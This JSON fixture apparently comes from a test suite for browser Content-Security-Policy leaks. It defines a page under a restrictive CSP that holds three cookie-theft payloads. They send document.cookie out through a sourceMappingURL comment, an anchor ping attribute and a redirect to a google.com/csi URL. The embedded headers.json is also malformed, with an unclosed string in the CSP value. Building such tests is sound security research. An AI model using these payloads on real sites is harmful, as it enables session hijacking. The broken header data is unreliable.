```json
{
  "c661126": {
    "url_queue.txt": "https://leak.test/CSP/c661126/main\nhttps://a.test/report/?leak=baseline\n",
    "leak.test": {
      "main": {
        "index.html": "<script>\n  document.write(`<script>//# sourceMappingURL=https://pkav/?${escape(document.cookie)}</script>`);\n</script>\n<a id='pingLink' href='#' onclick=\"this.ping='//pkav/?'+escape(document.cookie)\">Click me</a>\n<script>\n  location='https://www.google.com/csi?'+escape(document.cookie);\n</script>\n",
        "headers.json": "[\n  {\n    \"key\": \"Content-Security-Policy\",\n    \"value\": \"script-src 'self'; img-src 'self';\n  }\n]"
      }
    }
  }
}
```